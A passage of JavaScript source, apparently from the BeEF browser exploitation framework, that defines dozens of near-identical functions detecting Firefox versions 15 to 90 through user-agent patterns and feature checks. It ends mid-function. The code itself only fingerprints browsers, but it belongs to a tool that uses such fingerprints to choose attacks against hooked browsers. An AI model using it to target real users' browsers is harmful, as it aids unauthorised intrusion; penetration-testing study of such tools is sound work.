* Returns true if FF15
* @example: beef.browser.isFF15()
*/
isFF15: function () {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/15\./) != null;
},
/**
* Returns true if FF16
* @example: beef.browser.isFF16()
*/
isFF16: function () {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/16\./) != null;
},
/**
* Returns true if FF17
* @example: beef.browser.isFF17()
*/
isFF17: function () {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/17\./) != null;
},
/**
* Returns true if FF18
* @example: beef.browser.isFF18()
*/
isFF18: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/18\./) != null;
},
/**
* Returns true if FF19
* @example: beef.browser.isFF19()
*/
isFF19: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && window.navigator.userAgent.match(/Firefox\/19\./) != null;
},
/**
* Returns true if FF20
* @example: beef.browser.isFF20()
*/
isFF20: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && window.navigator.userAgent.match(/Firefox\/20\./) != null;
},
/**
* Returns true if FF21
* @example: beef.browser.isFF21()
*/
isFF21: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/21\./) != null;
},
/**
* Returns true if FF22
* @example: beef.browser.isFF22()
*/
isFF22: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/22\./) != null;
},
/**
* Returns true if FF23
* @example: beef.browser.isFF23()
*/
isFF23: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/23\./) != null;
},
/**
* Returns true if FF24
* @example: beef.browser.isFF24()
*/
isFF24: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/24\./) != null;
},
/**
* Returns true if FF25
* @example: beef.browser.isFF25()
*/
isFF25: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/25\./) != null;
},
/**
* Returns true if FF26
* @example: beef.browser.isFF26()
*/
isFF26: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/26./) != null;
},
/**
* Returns true if FF27
* @example: beef.browser.isFF27()
*/
isFF27: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && window.navigator.userAgent.match(/Firefox\/27./) != null;
},
/**
* Returns true if FF28
* @example: beef.browser.isFF28()
*/
isFF28: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt !== 'function' && window.navigator.userAgent.match(/Firefox\/28./) != null;
},
/**
* Returns true if FF29
* @example: beef.browser.isFF29()
*/
isFF29: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && window.navigator.userAgent.match(/Firefox\/29./) != null;
},
/**
* Returns true if FF30
* @example: beef.browser.isFF30()
*/
isFF30: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && window.navigator.userAgent.match(/Firefox\/30./) != null;
},
/**
* Returns true if FF31
* @example: beef.browser.isFF31()
*/
isFF31: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && window.navigator.userAgent.match(/Firefox\/31./) != null;
},
/**
* Returns true if FF32
* @example: beef.browser.isFF32()
*/
isFF32: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/32./) != null;
},
/**
* Returns true if FF33
* @example: beef.browser.isFF33()
*/
isFF33: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/33./) != null;
},
/**
* Returns true if FF34
* @example: beef.browser.isFF34()
*/
isFF34: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/34./) != null;
},
/**
* Returns true if FF35
* @example: beef.browser.isFF35()
*/
isFF35: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/35./) != null;
},
/**
* Returns true if FF36
* @example: beef.browser.isFF36()
*/
isFF36: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/36./) != null;
},
/**
* Returns true if FF37
* @example: beef.browser.isFF37()
*/
isFF37: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/37./) != null;
},
/**
* Returns true if FF38
* @example: beef.browser.isFF38()
*/
isFF38: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/38./) != null;
},
/**
* Returns true if FF39
* @example: beef.browser.isFF39()
*/
isFF39: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/39./) != null;
},
/**
* Returns true if FF40
* @example: beef.browser.isFF40()
*/
isFF40: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/40./) != null;
},
/**
* Returns true if FF41
* @example: beef.browser.isFF41()
*/
isFF41: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/41./) != null;
},
/**
* Returns true if FF42
* @example: beef.browser.isFF42()
*/
isFF42: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/42./) != null;
},
/**
* Returns true if FF43
* @example: beef.browser.isFF43()
*/
isFF43: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/43./) != null;
},
/**
* Returns true if FF44
* @example: beef.browser.isFF44()
*/
isFF44: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/44./) != null;
},
/**
* Returns true if FF45
* @example: beef.browser.isFF45()
*/
isFF45: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/45./) != null;
},
/**
* Returns true if FF46
* @example: beef.browser.isFF46()
*/
isFF46: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/46./) != null;
},
/**
* Returns true if FF47
* @example: beef.browser.isFF47()
*/
isFF47: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/47./) != null;
},
/**
* Returns true if FF48
* @example: beef.browser.isFF48()
*/
isFF48: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/48./) != null;
},
/**
* Returns true if FF49
* @example: beef.browser.isFF49()
*/
isFF49: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/49./) != null;
},
/**
* Returns true if FF50
* @example: beef.browser.isFF50()
*/
isFF50: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/50./) != null;
},
/**
* Returns true if FF51
* @example: beef.browser.isFF51()
*/
isFF51: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/51./) != null;
},
/**
* Returns true if FF52
* @example: beef.browser.isFF52()
*/
isFF52: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/52./) != null;
},
/**
* Returns true if FF53
* @example: beef.browser.isFF53()
*/
isFF53: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/53./) != null;
},
/**
* Returns true if FF54
* @example: beef.browser.isFF54()
*/
isFF54: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/54./) != null;
},
/**
* Returns true if FF55
* @example: beef.browser.isFF55()
*/
isFF55: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/55./) != null;
},
/**
* Returns true if FF56
* @example: beef.browser.isFF56()
*/
isFF56: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/56./) != null;
},
/**
* Returns true if FF57
* @example: beef.browser.isFF57()
*/
isFF57: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/57./) != null;
},
/**
* Returns true if FF58
* @example: beef.browser.isFF58()
*/
isFF58: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/58./) != null;
},
/**
* Returns true if FF59
* @example: beef.browser.isFF59()
*/
isFF59: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/59./) != null;
},
/**
* Returns true if FF60
* @example: beef.browser.isFF60()
*/
isFF60: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/60./) != null;
},
/**
* Returns true if FF61
* @example: beef.browser.isFF61()
*/
isFF61: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/61./) != null;
},
/**
* Returns true if FF62
* @example: beef.browser.isFF62()
*/
isFF62: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/62./) != null;
},
/**
* Returns true if FF63
* @example: beef.browser.isFF63()
*/
isFF63: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/63./) != null;
},
/**
* Returns true if FF64
* @example: beef.browser.isFF64()
*/
isFF64: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/64./) != null;
},
/**
* Returns true if FF65
* @example: beef.browser.isFF65()
*/
isFF65: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/65./) != null;
},
/**
* Returns true if FF66
* @example: beef.browser.isFF66()
*/
isFF66: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/66./) != null;
},
/**
* Returns true if FF67
* @example: beef.browser.isFF67()
*/
isFF67: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/67./) != null;
},
/**
* Returns true if FF68
* @example: beef.browser.isFF68()
*/
isFF68: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/68./) != null;
},
/**
* Returns true if FF69
* @example: beef.browser.isFF69()
*/
isFF69: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/69./) != null;
},
/**
* Returns true if FF70
* @example: beef.browser.isFF70()
*/
isFF70: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/70./) != null;
},
/**
* Returns true if FF71
* @example: beef.browser.isFF71()
*/
isFF71: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/71./) != null;
},
/**
* Returns true if FF72
* @example: beef.browser.isFF72()
*/
isFF72: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/72./) != null;
},
/**
* Returns true if FF73
* @example: beef.browser.isFF73()
*/
isFF73: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/73./) != null;
},
/**
* Returns true if FF74
* @example: beef.browser.isFF74()
*/
isFF74: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/74./) != null;
},
/**
* Returns true if FF75
* @example: beef.browser.isFF75()
*/
isFF75: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/75./) != null;
},
/**
* Returns true if FF76
* @example: beef.browser.isFF76()
*/
isFF76: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/76./) != null;
},
/**
* Returns true if FF77
* @example: beef.browser.isFF77()
*/
isFF77: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/77./) != null;
},
/**
* Returns true if FF78
* @example: beef.browser.isFF78()
*/
isFF78: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/78./) != null;
},
/**
* Returns true if FF79
* @example: beef.browser.isFF79()
*/
isFF79: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/79./) != null;
},
/**
* Returns true if FF80
* @example: beef.browser.isFF80()
*/
isFF80: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/80./) != null;
},
/**
* Returns true if FF81
* @example: beef.browser.isFF81()
*/
isFF81: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/81./) != null;
},
/**
* Returns true if FF82
* @example: beef.browser.isFF82()
*/
isFF82: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/82./) != null;
},
/**
* Returns true if FF83
* @example: beef.browser.isFF83()
*/
isFF83: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/83./) != null;
},
/**
* Returns true if FF84
* @example: beef.browser.isFF84()
*/
isFF84: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/84./) != null;
},
/**
* Returns true if FF85
* @example: beef.browser.isFF85()
*/
isFF85: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/85./) != null;
},
/**
* Returns true if FF86
* @example: beef.browser.isFF86()
*/
isFF86: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/86./) != null;
},
/**
* Returns true if FF87
* @example: beef.browser.isFF87()
*/
isFF87: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/87./) != null;
},
/**
* Returns true if FF88
* @example: beef.browser.isFF88()
*/
isFF88: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/88./) != null;
},
/**
* Returns true if FF89
* @example: beef.browser.isFF89()
*/
isFF89: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/89./) != null;
},
/**
* Returns true if FF90
* @example: beef.browser.isFF90()
*/
isFF90: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/90./) != null;
},
/**
* Returns true if FF91
* @example: beef.browser.isFF91()
*/
isFF91: function () {
